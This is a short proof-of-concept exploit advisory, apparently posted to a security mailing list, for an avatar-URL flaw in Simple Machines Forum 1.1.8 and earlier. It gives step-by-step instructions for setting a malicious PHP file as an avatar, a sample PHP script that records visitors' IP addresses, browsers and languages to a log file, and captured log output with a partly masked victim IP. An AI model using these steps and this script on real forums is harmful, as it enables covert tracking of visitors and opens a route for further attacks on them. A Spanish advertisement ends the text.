Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - About Vulnerability: This vulnerability allow execute a php external file in any visitor of the forum. The php file should have the malicious code. The scope of the attack depends on the strength of the php file. - Step by Step: 1) go to your profile in section of avatar. 2) put the url of the malicious php file as avatar (ex: http://target/poc.php). 3) create a new topic. - [victims] All the people that visit the topic will be infect. malicious file example [steal info]: (poc.php) <?php $ip = $_SERVER['REMOTE_ADDR']; $so= $_SERVER['HTTP_USER_AGENT']; $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE']; $url= $_SERVER['PHP_SELF']; $path= $_SERVER['DOCUMENT_ROOT']; $archivo = 'hacks.txt'; $fp = fopen($archivo, "a"); $string = " Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC by Jose Luis Gongora Fernandez (aka) JosS $path$url VICTIM: $ip info: $so language: $lan "; $write = fputs($fp, $string); fclose($fp); ?> ------END----- cat hacks.txt Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC by Jose Luis Gongora Fernandez (aka) JosS /***/***/vhosts/hack0wn.com/httpdocs/poc.php VICTIM: 88.25.92.*** info: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.19) Gecko/20081202 Iceweasel/2.0.0.19 (Debian-2.0.0.19-0etch1) language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 // tested on smf 1.1.8 __h0__ ________________________________ ?Sabes que la Videollamada de Messenger es GRATIS ?Descbrela!<http://events.es.msn.com/windows-live/redes-sociales/default.aspx>